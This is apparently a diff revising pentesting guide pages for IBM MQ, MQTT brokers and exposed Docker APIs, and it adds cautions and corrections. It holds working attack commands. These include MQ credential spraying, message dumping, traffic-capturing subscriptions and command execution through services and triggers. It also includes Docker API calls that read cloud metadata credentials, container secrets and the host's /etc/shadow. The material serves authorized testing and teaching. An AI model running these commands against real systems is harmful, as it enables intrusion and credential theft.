-The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but **also to control the instance**.
+What a client can do through an MQ listener depends on the selected `SVRCONN` channel, CHLAUTH mapping, authentication, and Object Authority Manager (OAM) permissions. A highly privileged identity may manipulate messages and administer queue-manager objects; an ordinary application identity should be much more restricted.
 
 IBM provides a large technical documentation available on [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).<sup>[[3]](#references)</sup>
 
 ## Tools
 
-A suggested tool for easy exploitation is **[punch-q](https://github.com/sensepost/punch-q)**, with Docker usage. The tool is actively using the Python library `pymqi`.
+A convenient assessment tool is **[punch-q](https://github.com/sensepost/punch-q)**, which uses the Python `pymqi` library and can also run from Docker.<sup>[[11]](#references)</sup>
 
 For a more manual approach, use the Python library **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) are needed.
 
 ### Installing pymqi
 
-**IBM MQ dependencies** needs to be installed and loaded:
+The following procedure is a **legacy IBM MQ 9.0.0.4 installation recipe** retained for reproducing older tooling environments. Prefer a current supported redistributable IBM MQ client for new labs; it is relocatable and does not require a system RPM installation.<sup>[[10]](#references)</sup>
 
 1. Create an account (IBMid) on [https://login.ibm.com/](https://login.ibm.com/).
 2. Download IBM MQ libraries from [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-\*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). For Linux x86_64 it is **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
 3. Decompress (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
 4. Run `sudo ./mqlicense.sh` to accept licenses terms.
 
-> If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110):
+> [!CAUTION]
+> The historical workaround below disables the package's platform check. Use it only in a disposable lab with the matching archived package; for a normal system, use a supported client package instead.
+>
+> On the old Kali setup, the workaround was to modify `mqlicense.sh` and remove/comment these lines:
 >
 > ```bash
 > if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
@@ -48,7 +49,7 @@ sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x
 sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
 ```
 
-6. Then, temporary add the `.so` files to LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **before** running other tools using these dependencies.
+6. Temporarily add the client shared libraries to the loader path before running dependent tools: `export LD_LIBRARY_PATH=/opt/mqm/lib64`.
 
 Then, you can clone the project [**pymqi**](https://github.com/dsuch/pymqi): it contains interesting code snippets, constants, ... Or you can directly install the library with: `pip install pymqi`.
 
@@ -100,7 +101,7 @@ Queue Manager name: MYQUEUEMGR
 "SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
 ```
 
-It happens that some IBM MQ instances accept **unauthenticated** MQ requests, so `--username / --password` is not needed. Of course, access rights can also vary.
+Some IBM MQ instances or developer channels accept connections without an application-supplied username/password; in that case omit the credential options. The channel can still map the connection to a local identity, and OAM rights determine subsequent access.
 
 As soon as we get one channel name (here: `DEV.ADMIN.SVRCONN`), we can enumerate all other channels.<sup>[[2]](#references)</sup>
 
@@ -169,13 +170,13 @@ Showing channels with prefix: "*"...
 
 ### Users / password spraying
 
-Once you know a valid `SVRCONN` channel, do not stop at queue enumeration: **punch-q** also has a `discover users` mode that brute-forces common IBM MQ credentials against that specific channel.
+Once you know a valid `SVRCONN` channel, **punch-q** has a `discover users` mode for testing candidate IBM MQ credentials against that channel. This can lock accounts or trigger monitoring, so use a small approved candidate set and honor the target's rate/lockout policy.
 
 ```bash
 ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover users --channel DEV.ADMIN.SVRCONN
 ```
 
-This is especially useful against environments that reuse operating-system, LDAP, or service-account credentials for MQ logins. If channel discovery returns a TLS error instead of `2035`, treat that as recon too: the channel probably exists but expects a compatible `SSLCIPH` and, sometimes, client-certificate material.
+A TLS error instead of authorization reason code `2035` can indicate that the candidate channel exists but requires a compatible `SSLCIPH` and possibly client-certificate material. Corroborate this because gateways can normalize errors.
 
 If the channel list shows a non-empty **SSL Cipher**, or `punch-q` says a channel "wants SSL", shift to **client-artifact looting** instead of blind spraying. IBM MQ clients can inherit channel and TLS settings from a **CCDT** (`AMQCLCHL.TAB` or JSON), `mqclient.ini`, and a key repository. Hunt for `MQCCDTURL`, `MQCHLLIB`, `MQCHLTAB`, `mqclient.ini`, `*.kdb`, `*.sth`, and `*.p12` files in application servers, CI jobs, containers, or Kubernetes Secrets. Recent IBM MQ versions also support **HTTPS-hosted CCDTs**, so a leaked `MQCCDTURL=https://...` can be enough to recover queue-manager names, channel names, hosts, ports, and TLS requirements without first touching the MQ server itself.
 
@@ -267,7 +268,10 @@ Showing queues with prefix: "*"...
 
 ### Topics / subscriptions
 
-IBM MQ is not limited to queues. If the target uses publish/subscribe, an **administrative subscription** is an excellent passive collection primitive: you can route publications matching a topic string into a queue you control, then dump that queue with **punch-q** or the REST API.<sup>[[8]](#references)</sup>
+IBM MQ also supports publish/subscribe. With administrative rights, an **administrative subscription** can route publications matching a topic string into a destination queue for later inspection.<sup>[[8]](#references)</sup>
+
+> [!CAUTION]
+> Defining a queue/subscription changes queue-manager state and may capture sensitive production traffic. Use the following commands only in an authorized lab or with explicit approval and remove the created objects afterward.
 
 Quick recon examples:
 
@@ -283,7 +287,7 @@ echo "DEFINE QLOCAL(HACK.SUBQ) REPLACE" | runmqsc MYQUEUEMGR
 echo "DEFINE SUB(HACK.SUB) TOPICSTR('dev/#') DEST(HACK.SUBQ) DESTCLAS(PROVIDED) WSCHEMA(TOPIC) REPLACE" | runmqsc MYQUEUEMGR
 ```
 
-From there, stolen publications arrive on `HACK.SUBQ` like ordinary queue messages. If `1414` is blocked but the admin REST API on `9443` is reachable, send the same MQSC through `/ibmmq/rest/v3/admin/action/qmgr/<qmgr>/mqsc`. This is particularly handy in lab and developer-style deployments where application users already have `pub` / `sub` rights on `DEV.*` topics.
+From there, matching publications arrive on `HACK.SUBQ` like ordinary queue messages. If `1414` is blocked but the admin REST API on `9443` is reachable, the same MQSC can be sent through `/ibmmq/rest/v3/admin/action/qmgr/<qmgr>/mqsc`. Application `pub`/`sub` rights alone do not normally grant authority to define administrative objects.
 
 ## Exploit
 
@@ -299,7 +303,7 @@ You can target queue(s)/channel(s) to sniff out / dump messages from them (non-d
 ❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
 ```
 
-**Do not hesitate to iterate on all identified queues.**
+Assess every in-scope queue, but use browse/non-destructive operations first and avoid consuming production messages.
 
 ### Dump / put messages through `9443`
 
@@ -363,7 +367,7 @@ curl -sku 'app:passw0rd' \
 >
 > There is also a warning of the command in the docs: _"Attention: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."_
 >
-> _Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` to run the equivalent MQSC command for service creation (`DEFINE SERVICE`). This aspect is not covered yet here._
+> IBM MQ also exposes an HTTP endpoint at `/admin/action/qmgr/{qmgrName}/mqsc` for equivalent MQSC commands such as `DEFINE SERVICE`; the REST workflow is shown below.
 
 If **MQ Console / REST API** credentials are available, you can often reach the same administrative primitives over HTTPS on **9443** without using the MQ client libraries. IBM documents `/ibmmq/rest/v3/admin/action/qmgr/{qmgrName}/mqsc` as an endpoint that accepts **plain-text MQSC** or **JSON** commands.<sup>[[4]](#references)</sup>
 
@@ -398,7 +402,7 @@ Cleaning up service...
 Done
 ```
 
-**Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit** **_(listener for reverse shell, file creation on different service, data exfiltration through network ...)_**
+Program launch is asynchronous, so observe its effect through an approved side channel such as a harmless file in a lab, application logs, or a controlled callback listener.
 
 The same technique can be driven from the REST API:
 
@@ -454,7 +458,10 @@ echo "DISPLAY QLOCAL(*) INITQ PROCESS TRIGGER TRIGTYPE" | runmqsc MYQUEUEMGR
 echo "DISPLAY PROCESS(*) APPLICID APPLTYPE USERDATA" | runmqsc MYQUEUEMGR
 ```
 
-If you find a queue that already has a live `INITQ`, point it at an attacker-controlled process definition:
+If you find a queue with a live `INITQ`, the following lab sequence demonstrates the risk of replacing its process association:
+
+> [!CAUTION]
+> `ALTER QLOCAL` changes an existing application's behavior. Record the original attributes and run this only in a disposable lab or with explicit change approval; restore the queue and delete `HACKPROC` afterward.
 
 ```bash
 echo "DEFINE PROCESS(HACKPROC) REPLACE APPLTYPE(UNIX) APPLICID('/bin/sh') USERDATA('-c id >/tmp/mq.trigger')" | runmqsc MYQUEUEMGR
@@ -549,7 +556,7 @@ If you cannot find the constant names, you can refer to the [IBM MQ documentatio
 
 ## Testing environment
 
-If you want to test the IBM MQ behavior and exploits, you can set up a local environment based on Docker:
+To test IBM MQ behavior safely, set up a local containerized environment:
 
 1. Having an account on ibm.com and cloud.ibm.com.
 2. Create a containerized IBM MQ with:
@@ -607,5 +614,7 @@ CONTAINER ID   IMAGE                                COMMAND                  CRE
 - [7] [IBM MQ container default developer configuration](https://github.com/ibm-messaging/mq-container/blob/master/docs/developer-config.md)
 - [8] [Defining an administrative subscription](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=subscriptions-defining-administrative-subscription)
 - [9] [Starting IBM MQ applications using triggers](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=queuing-starting-mq-applications-using-triggers)
+- [10] [Redistributable IBM MQ clients](https://www.ibm.com/docs/en/ibm-mq/9.4.x?topic=overview-redistributable-mq-clients)
+- [11] [SensePost – Punching Messages in the Q](https://sensepost.com/blog/2018/punching-messages-in-the-q/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
+++ b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial.
+**MQTT** is a lightweight **publish/subscribe messaging protocol** designed for constrained devices and low-bandwidth, high-latency, or unreliable networks. Its small control-packet overhead and three quality-of-service levels make it common in machine-to-machine, IoT, and mobile applications.<sup>[[10]](#references)</sup>
 
 **Default port:** 1883
 
@@ -15,7 +15,7 @@ PORT     STATE SERVICE                 REASON
 
 ## Inspecting the traffic
 
-When a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.
+After a client sends **CONNECT**, the broker answers with **CONNACK**. In MQTT 3.1.1, return code **0x00** means that the connection was accepted and **0x05** means “not authorized”; this can reflect invalid credentials, an unauthorized client, or another broker policy. MQTT 5 uses reason codes instead (for example, `0x87` for “Not authorized”), so interpret captures according to the negotiated protocol version.<sup>[[10]](#references)</sup>
 
 For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:
 
@@ -32,7 +32,7 @@ For instance, if the broker rejects the connection due to invalid credentials, t
 
 ## Pentesting MQTT
 
-**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords.
+MQTT itself does not require username/password authentication, and plain MQTT on TCP/1883 does not provide transport encryption. If a deployment sends credentials over an unprotected listener, an on-path attacker can capture them; TLS-enabled listeners are commonly exposed on TCP/8883.<sup>[[10]](#references)[[11]](#references)</sup>
 
 To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing:
 
@@ -44,7 +44,7 @@ To connect to a MQTT service you can use: [https://github.com/bapowell/python-mq
 
 You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn)
 
-You can also use:
+You can also use the Mosquitto command-line clients:<sup>[[11]](#references)</sup>
 
 ```bash
 apt-get install mosquitto mosquitto-clients
@@ -65,7 +65,7 @@ PORT = 1883
 
 def on_connect(client, userdata, flags, rc):
 	client.subscribe('#', qos=1)
-	client.subscribe('$SYS/index.html#')
+	client.subscribe('$SYS/#')
 
 def on_message(client, userdata, message):
 	print('Topic: %s | QOS: %s  | Message: %s' % (message.topic, message.qos, message.payload))
@@ -90,15 +90,15 @@ The publish/subscribe model is composed of:
 - **Publisher**: publishes a message to one (or many) topic(s) in the broker.
 - **Subscriber**: subscribes to one (or many) topic(s) in the broker and receives all the messages sent from the publisher.
 - **Broker**: routes all the messages from the publishers to the subscribers.
-- **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature).
+- **Topic**: consists of one or more levels separated by a forward slash (for example, `smarthouse/livingroom/temperature`).
 
 ### Packet Format <a href="#f15a" id="f15a"></a>
 
-Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
+Every MQTT control packet contains a fixed header with a packet type, type-specific flags, and a variable-byte remaining-length field.<sup>[[10]](#references)</sup>
 
 ![https://miro.medium.com/max/838/1*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1*k6RkAHEk0576geQGUcKSTA.png)
 
-### Packet Types
+### Packet Types<sup>[[10]](#references)</sup>
 
 - CONNECT (1): Initiated by the client to request a connection to the server.
 - CONNACK (2): The server's acknowledgment of a successful connection.
@@ -146,13 +146,14 @@ Even if `<likely_topic>` is wrong or denied, a resumed session may still push qu
 ## IoT MQTT ecosystem attacks: plaintext brokers and topic ACL bypass
 
 Many consumer IoT platforms expose MQTT brokers that are used by two distinct roles:<sup>[[1]](#references)</sup>
+
 - Gateway/hub devices that bridge radio protocols (e.g., BLE/LoRa/Zigbee) to the cloud.
 - Mobile apps or web backends that control devices via “app” topics.
 
 Common weaknesses you can abuse during a pentest:
 
 - Plaintext MQTT over non-standard ports (e.g., TCP/8001) instead of MQTTS. Any on-path observer can read credentials and control frames. Use Wireshark to spot cleartext CONNECT/CONNACK and SUBSCRIBE/PUBLISH traffic on unusual ports.
-- Weak or missing per-tenant topic ACLs. If topics are namespaced only by deviceId (e.g., "/tenantless/<deviceId>/tx"), any authenticated user might PUBLISH to other tenants’ devices.
+- Weak or missing per-tenant topic ACLs. If topics are namespaced only by a device ID (for example, `/tenantless/<deviceId>/tx`), any authenticated user might `PUBLISH` to other tenants' devices.
 - Sensitive data leakage via maintenance/admin topics (e.g., Wi‑Fi credentials broadcast in cleartext after config changes).
 
 Examples (replace placeholders with real values):
@@ -330,4 +331,6 @@ Notes:
 - [7] [RabbitMQ Web MQTT Plugin](https://www.rabbitmq.com/docs/next/web-mqtt)
 - [8] [Persistent session state can be destroyed by a spoofed CONNECT with Clean Session=1](https://github.com/eclipse-mosquitto/mosquitto/issues/3551)
 - [9] [Authenticated user can hijack another user's session via ClientID and exfiltrate queued messages (MQTT v5.0)](https://github.com/eclipse-mosquitto/mosquitto/issues/3553)
+- [10] [OASIS MQTT Version 5.0 specification](https://docs.oasis-open.org/mqtt/mqtt/v5.0/mqtt-v5.0.html)
+- [11] [Eclipse Mosquitto `mosquitto_sub` manual](https://mosquitto.org/man/mosquitto_sub-1.html)
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/2375-pentesting-docker.md
+++ b/src/network-services-pentesting/2375-pentesting-docker.md
@@ -4,13 +4,13 @@
 
 ### Docker Basics
 
-#### What is
+#### What it is
 
-Docker is the **forefront platform** in the **containerization industry**, spearheading **continuous innovation**. It facilitates the effortless creation and distribution of applications, spanning from **traditional to futuristic**, and assures their **secure deployment** across diverse environments.
+Docker is a platform for building, distributing, and running applications in containers. The Docker Engine exposes a versioned REST API used by its command-line client and SDKs.<sup>[[8]](#references)</sup>
 
 #### Basic docker architecture
 
-- [**containerd**](http://containerd.io): This is a **core runtime** for containers, tasked with the comprehensive **management of a container's lifecycle**. This involves handling **image transfer and storage**, in addition to overseeing the **execution, monitoring, and networking** of containers. **More detailed insights** on containerd are **further explored**.
+- [**containerd**](https://containerd.io): A container runtime that manages image transfer and storage, snapshots, container execution, and supervision.
 - The **container-shim** plays a critical role as an **intermediary** in the handling of **headless containers**, seamlessly taking over from **runc** after the containers are initialized.
 - [**runc**](http://runc.io): Esteemed for its **lightweight and universal container runtime** capabilities, runc is aligned with the **OCI standard**. It is used by containerd to **start and manage containers** according to the **OCI guidelines**, having evolved from the original **libcontainer**.
 - [**grpc**](http://www.grpc.io) is essential for **facilitating communication** between containerd and the **docker-engine**, ensuring **efficient interaction**.
@@ -20,21 +20,21 @@ Docker is the **forefront platform** in the **containerization industry**, spear
 
 ```bash
 docker version #Get version of docker client, API, engine, containerd, runc, docker-init
-docker info #Get more infomarion about docker settings
+docker info # Get more information about Docker settings
 docker pull registry:5000/alpine #Download the image
-docker inspect <containerid> #Get info of the contaienr
+docker inspect <containerid> # Get information about the container
 docker network ls #List network info
 docker exec -it <containerid> /bin/sh #Get shell inside a container
-docker commit <cotainerid> registry:5000/name-container #Update container
+docker commit <containerid> registry:5000/name-container # Create an image from a container
 docker export -o alpine.tar <containerid> #Export container as tar file
 docker save -o ubuntu.tar <image> #Export an image
 docker ps -a #List running and stopped containers
-docker stop <containedID> #Stop running container
+docker stop <containerID> # Stop a running container
 docker rm <containerID> #Remove container ID
 docker image ls #List images
-docker rmi <imgeID> #Remove image
+docker rmi <imageID> # Remove an image
 docker system prune -a
-#This will remove:
+# This destructive command removes:
 #  - all stopped containers
 #  - all networks not used by at least one container
 #  - all images without at least one container associated to them
@@ -43,11 +43,11 @@ docker system prune -a
 
 #### Containerd
 
-**Containerd** was specifically developed to serve the needs of container platforms like **Docker and Kubernetes**, among others. It aims to **simplify the execution of containers** across various operating systems, including Linux, Windows, Solaris, and more, by abstracting operating system-specific functionality and system calls. The goal of Containerd is to include only the essential features required by its users, striving to omit unnecessary components. However, achieving this goal completely is acknowledged as challenging.
+**containerd** is designed to be embedded in platforms such as Docker and Kubernetes. It runs as a daemon on Linux and Windows and keeps a deliberately focused scope: content and image management, snapshots, container lifecycle operations, and supervision.<sup>[[2]](#references)</sup>
 
-A key design decision is that **Containerd does not handle networking**. Networking is considered a critical element in distributed systems, with complexities such as Software Defined Networking (SDN) and service discovery that vary significantly from one platform to another. Therefore, Containerd leaves networking aspects to be managed by the platforms it supports.
+A key design boundary is that higher-level platforms choose and configure container networking. containerd can manage low-level network attachments and integrates with CRI/CNI plugins, but it does not provide Docker's complete network-management or orchestration user experience.<sup>[[2]](#references)</sup>
 
-While **Docker utilizes Containerd** to run containers, it's important to note that Containerd only supports a subset of Docker's functionalities. Specifically, Containerd lacks the network management capabilities present in Docker and does not support the creation of Docker swarms directly. This distinction highlights Containerd's focused role as a container runtime environment, delegating more specialized functionalities to the platforms it integrates with.<sup>[[2]](#references)</sup>
+Docker uses containerd as part of its runtime stack, while Docker Engine adds higher-level APIs and features such as Docker networking, builds, and Swarm orchestration. The bundled `ctr` client is primarily a low-level debugging tool rather than a stable Docker CLI replacement.<sup>[[2]](#references)</sup>
 
 ```bash
 #Containerd CLI
@@ -60,7 +60,7 @@ ctr task start <containerName> #You are given a shell inside of it
 ctr task list #Get status of containers
 ctr tasks attach <containerName> #Get shell in running container
 ctr task pause <containerName> #Stop container
-ctr tasks resume <containerName> #Resume cotainer
+ctr tasks resume <containerName> #Resume container
 ctr task kill -s SIGKILL <containerName> #Stop running container
 ctr container delete <containerName>
 ```
@@ -80,18 +80,18 @@ Podman is designed to be compatible with Docker's API, allowing for the use of D
 Podman's approach offers a secure and flexible alternative to Docker, emphasizing user privilege management and compatibility with existing Docker workflows.<sup>[[1]](#references)</sup>
 
 > [!TIP]
-> Note that as podam aims to support the same API as docker, you can use the same commands with podman as with docker such as:
+> Because Podman implements a Docker-compatible command-line experience and API, many familiar commands have Podman equivalents, such as:
 >
 > ```bash
 > podman --version
 > podman info
-> pdoman images ls
-> podman ls
+> podman images
+> podman ps
 > ```
 
 ### Basic Information
 
-Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / (root directory) to the container and read/write files of the host’s environment.
+Docker Engine normally listens on a local Unix socket, not on a TCP port. When administrators expose the daemon over unauthenticated plain TCP, port **2375** is conventional; TLS-protected access commonly uses **2376**. Anyone who can control the daemon can usually obtain root-equivalent access to the host, for example by creating a container with the host root filesystem bind-mounted.<sup>[[7]](#references)</sup>
 
 **Default port:** 2375
 
@@ -142,7 +142,7 @@ Server: Docker Engine - Community
   GitCommit:        fec3683
 ```
 
-If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service.
+If the `docker` client can contact the remote API, you can run the [commands shown earlier](2375-pentesting-docker.md#basic-commands) against that daemon.
 
 > [!TIP]
 > You can `export DOCKER_HOST="tcp://localhost:2375"` and **avoid** using the `-H` parameter with the docker command
@@ -155,36 +155,36 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
 
 **Curl**
 
-Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but it's possible to do it with curl.
+Port **2376** commonly exposes the API over TLS. Use `docker --tlsverify -H tcp://<host>:2376 ...` when you have the appropriate CA and client material, or use `curl` with equivalent TLS options. The `--insecure` examples below are appropriate only for an authorized test where certificate validation is intentionally being bypassed.<sup>[[7]](#references)</sup>
 
 ```bash
 #List containers
-curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
+curl --insecure https://tlsopen.docker.socket:2376/containers/json | jq
 #List processes inside a container
-curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
+curl --insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
 #Set up and exec job to hit the metadata URL
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}']
+curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["/bin/sh","-c","wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
 #Get the output
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
 # list secrets (no secrets/swarm not set up)
-curl -s –insecure https://tlsopen.docker.socket:2376/secrets | jq
+curl -s --insecure https://tlsopen.docker.socket:2376/secrets | jq
 #Check what is mounted
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
 #Get the output by starting the exec
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
 #Cat the mounted secret
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
 #List service (If you have secrets, it’s also worth checking out services in case they are adding secrets via environment variables)
-curl -s –insecure https://tls-opendocker.socket:2376/services | jq
+curl -s --insecure https://tls-opendocker.socket:2376/services | jq
 #Creating a container that has mounted the host file system and read /etc/shadow
-curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
-curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test
-curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
-curl –insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "/dev/null"], "HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start
+curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
+curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
 #Stop the container
-curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
+curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop
 #Delete stopped containers
-curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
+curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
 ```
 
 If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)<sup>[[3]](#references)</sup>
@@ -238,14 +238,9 @@ nmap -sV --script "docker-*" -p <PORT> <IP>
 
 ### Compromising
 
-In the following page you can find ways to **escape from a container**:
+The [container-security page](../linux-hardening/containers-namespaces/container-security/) describes additional container-escape techniques.
 
-
-{{#ref}}
